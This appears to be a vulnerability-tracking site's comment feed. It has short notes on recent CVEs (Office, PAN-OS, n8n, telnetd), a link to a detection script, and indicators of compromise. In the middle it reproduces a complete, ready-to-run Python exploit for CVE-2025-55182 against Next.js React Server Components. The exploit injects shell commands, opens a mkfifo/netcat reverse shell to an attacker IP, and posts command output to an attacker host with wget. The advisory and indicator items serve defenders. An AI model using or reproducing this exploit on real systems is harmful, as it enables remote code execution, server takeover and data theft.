Recent comments
Log in or create an account to share your comment.
On 26 January 2026, Microsoft disclosed the actively exploited vulnerability CVE-2026-21509 in Microsoft Office, and within days weaponized DOC files appeared in public and via phishing campaigns targeting Ukrainian and EU government entities, using lures related to Ukraine and EU COREPER meetings; opening the documents triggers a WebDAV-based infection chain that downloads an LNK file, deploys a malicious DLL through COM hijacking and explorer.exe restart, executes shellcode hidden in an image, and ultimately launches the COVENANT command-and-control framework, which leverages the legitimate Filen cloud infrastructure, indicating a coordinated campaign likely to expand rapidly due to delayed patching and limited adoption of mitigations.
This script allows detection of EPMM device. https://github.com/D4-project/Plum-Rules-NSE/blob/main/ivanti_epmm.nse
This NSE Script allows detection of EPMM servers using NMAP
https://github.com/D4-project/Plum-Rules-NSE/blob/main/ivanti_epmm.nse
telnetd: Enable autologin in legacy mode.
Without authentication, autologin was broken. Bug reported by Kuaikuai Wu to the list in `2014-12/msg00010.html'.
A vulnerability in Palo Alto Networks PAN-OS software enables an unauthenticated attacker to cause a denial of service (DoS) to the firewall. Repeated attempts to trigger this issue results in the firewall entering into maintenance mode.
Reference: https://security.paloaltonetworks.com/CVE-2026-0227
The Ni8mare Test: n8n RCE Under the Microscope (CVE-2026-21858)
2026-01-12T07:42:19 by Alexandre DulaunoyInteresting statement from this article Horizon3.ai has seen no evidence of customers using vulnerable configurations of n8n, even if the versions in use are within the vulnerable range. While the vulnerability exists, certain pre-requisites will limit widespread exploitability."
Trendy vulnerabilities aren’t always worth the hype—panic-driven responses often lead to wasted time and resources. This is top of mind for us as we’ve researched recent issues regarding n8n, a popular AI workflow automation tool. After assessing relevant data from customer’s production environments, Horizon3.ai’s Attack Team determined that the blast radius of CVE-2026-21858 is not as large as initially claimed:
- n8n Unauthenticated Remote Code Execution aka Ni8mare vulnerability (CVE-2026-21858) garnered attention regarding the RCE potential, but Horizon3.ai determined that no customer instances are impacted, even those running vulnerable versions.
Whenever a new vulnerability surfaces and makes headlines, organizations are left scrambling to determine whether they’re at risk. Failing to do so introduces major exposure if a vulnerability does turn out to be critical. But with a myriad of security products misleading users with claims of hundreds of critical installations, teams are left overwhelmed with what to fix, what to fix first, and most critically, why. Let’s dive into what we know about this latest trending vulnerability.
#!/usr/bin/env python3
"""
CVE-2025-55182 - React Server Components RCE Exploit
Full Remote Code Execution against Next.js applications
⚠️ FOR AUTHORIZED SECURITY TESTING ONLY ⚠️
Affected versions:
- react-server-dom-webpack: 19.0.0 - 19.2.0
- Next.js: 15.x, 16.x (using App Router with Server Actions)
The vulnerability exploits prototype pollution in the Flight protocol
deserialization to achieve arbitrary code execution.
Credit:
- Wiz for vuln discovery
- @maple3142 for first working poc
- @dez_ for this vibe poc
"""
import requests
import argparse
import sys
import time
class CVE2025_55182_RCE:
"""Full RCE exploit for CVE-2025-55182"""
def __init__(self, target_url: str, timeout: int = 15):
self.target_url = target_url.rstrip('/')
self.timeout = timeout
self.session = requests.Session()
def build_payload(self, command: str) -> dict:
"""
Build the RCE payload that exploits prototype pollution.
The payload creates a fake React chunk object that:
1. Pollutes Object.prototype.then via "$1:__proto__:then"
2. Sets _formData.get to Function constructor via "$1:constructor:constructor"
3. Injects code via _prefix that gets passed to Function()
"""
# Escape single quotes in command
escaped_cmd = command.replace("'", "'\"'\"'")
# The malicious fake chunk structure
payload_0 = (
'{"then":"$1:__proto__:then",'
'"status":"resolved_model",'
'"reason":-1,'
'"value":"{\\"then\\":\\"$B1337\\"}",'
'"_response":{'
'"_prefix":"process.mainModule.require(\'child_process\').execSync(\'' + escaped_cmd + '\');",'
'"_chunks":"$Q2",'
'"_formData":{"get":"$1:constructor:constructor"}'
'}}'
)
return {
'0': (None, payload_0),
'1': (None, '"$@0"'), # Reference to chunk 0
'2': (None, '[]'), # Empty array for chunks
}
def execute(self, command: str) -> dict:
"""
Execute arbitrary command on the target server.
Args:
command: Shell command to execute
Returns:
dict with success status and any output
"""
print(f"[*] Target: {self.target_url}")
print(f"[*] Command: {command}")
headers = {
'Accept': 'text/x-component',
'Next-Action': 'x', # Invalid action ID triggers vulnerable path
'User-Agent': 'CVE-2025-55182-Exploit/1.0',
}
files = self.build_payload(command)
result = {
'success': False,
'command': command,
'target': self.target_url,
}
try:
print(f"[*] Sending exploit payload...")
resp = self.session.post(
self.target_url,
headers=headers,
files=files,
timeout=self.timeout
)
result['status_code'] = resp.status_code
result['response'] = resp.text[:500]
# A 500 response often indicates the exploit worked
# (the command runs but the response fails to serialize)
if resp.status_code == 500:
print(f"[+] Exploit sent successfully (status 500)")
result['success'] = True
else:
print(f"[?] Unexpected status: {resp.status_code}")
except requests.exceptions.Timeout:
# Timeout is expected - the server hangs processing the payload
print(f"[+] Request timed out (expected during RCE)")
result['success'] = True
result['timeout'] = True
except Exception as e:
print(f"[-] Error: {e}")
result['error'] = str(e)
return result
def check_vulnerability(self) -> bool:
"""Quick check if target is vulnerable"""
print(f"[*] Checking if {self.target_url} is vulnerable...")
headers = {
'Accept': 'text/x-component',
'Next-Action': 'x',
}
# Simple detection payload
files = {
'0': (None, '["$1:a:a"]'),
'1': (None, '{}'),
}
try:
resp = self.session.post(
self.target_url,
headers=headers,
files=files,
timeout=10
)
if resp.status_code == 500 and 'E{"digest"' in resp.text:
print(f"[+] Target appears VULNERABLE!")
return True
else:
print(f"[-] Target may not be vulnerable (status {resp.status_code})")
return False
except Exception as e:
print(f"[-] Check failed: {e}")
return False
def reverse_shell(self, attacker_ip: str, attacker_port: int) -> dict:
"""
Attempt to establish a reverse shell.
Args:
attacker_ip: IP address to connect back to
attacker_port: Port to connect back to
"""
# mkfifo reverse shell - works on Alpine/busybox containers
revshell = (
f"rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc {attacker_ip} {attacker_port} >/tmp/f"
)
print(f"\n[!] Attempting reverse shell to {attacker_ip}:{attacker_port}")
print(f"[!] Start listener: nc -lvnp {attacker_port}")
return self.execute(revshell)
def exfiltrate(self, command: str, attacker_ip: str, attacker_port: int) -> dict:
"""
Execute command and send output to attacker via HTTP POST.
Args:
command: Command to execute
attacker_ip: IP address to send output to
attacker_port: Port to send output to
Start a listener with: nc -lvnp PORT
Output will arrive as HTTP POST body.
"""
# Using wget to POST command output back
exfil_cmd = f'wget --post-data="$({command})" http://{attacker_ip}:{attacker_port}/ -O- 2>/dev/null'
print(f"\n[!] Executing: {command}")
print(f"[!] Output will POST to {attacker_ip}:{attacker_port}")
print(f"[!] Start listener: nc -lvnp {attacker_port}")
return self.execute(exfil_cmd)
def main():
parser = argparse.ArgumentParser(
description='CVE-2025-55182 React Server Components RCE Exploit',
formatter_class=argparse.RawDescriptionHelpFormatter,
epilog='''
Examples:
# Check if vulnerable
python3 exploit_rce.py http://target:3000 --check
# Execute command (blind)
python3 exploit_rce.py http://target:3000 -c "id"
# Execute command with output exfiltration
python3 exploit_rce.py http://target:3000 --exfil "id" 10.0.0.1 4444
# Reverse shell (uses mkfifo + nc, works on Alpine)
python3 exploit_rce.py http://target:3000 --revshell 10.0.0.1 4444
'''
)
parser.add_argument('target', help='Target URL (e.g., http://localhost:3000)')
parser.add_argument('-c', '--command', help='Command to execute (blind)')
parser.add_argument('--check', action='store_true', help='Check if vulnerable')
parser.add_argument('--revshell', nargs=2, metavar=('IP', 'PORT'),
help='Reverse shell to IP:PORT')
parser.add_argument('--exfil', nargs=3, metavar=('CMD', 'IP', 'PORT'),
help='Execute CMD and POST output to IP:PORT')
parser.add_argument('-t', '--timeout', type=int, default=15,
help='Request timeout (default: 15)')
args = parser.parse_args()
if not any([args.check, args.command, args.revshell, args.exfil]):
parser.print_help()
print("\n[!] Specify --check, --command, --revshell, or --exfil")
return 1
exploit = CVE2025_55182_RCE(args.target, args.timeout)
print("=" * 60)
print("CVE-2025-55182 - React Server Components RCE")
print("=" * 60)
if args.check:
return 0 if exploit.check_vulnerability() else 1
if args.command:
result = exploit.execute(args.command)
return 0 if result.get('success') else 1
if args.revshell:
ip, port = args.revshell
result = exploit.reverse_shell(ip, int(port))
return 0 if result.get('success') else 1
if args.exfil:
cmd, ip, port = args.exfil
result = exploit.exfiltrate(cmd, ip, int(port))
return 0 if result.get('success') else 1
return 0
if __name__ == '__main__':
sys.exit(main())
Some cases have been detected in Luxembourg.
Check SoftwareDistribution.log for:
- SoapUtilities.CreateException ThrowException: actor = https://host:8531/ClientWebService/client.asmx -> Error thrown in SoftwareDistribution.log after exploitation
- AAEAAAD/////AQAAAAAAAAAEAQAAAH9 -> Part of the serialized payload, found in SoftwareDistribution.log
- 207.180.254[.]242 – VPS from which the exploit was sent
- ac7351b617f85863905ba8a30e46a112a9083f4d388fd708ccfe6ed33b5cf91d – SHA256 hash of embedded MZ payload
> There is growing speculation that the Red Hat compromise may be linked to a recently disclosed vulnerability in Red Hat OpenShift AI — CVE-2025-10725 (CVSS 9.9).
https://www.seqrite.com/blog/anatomy-of-the-red-hat-intrusion-crimson-collective-and-slsh-extortions/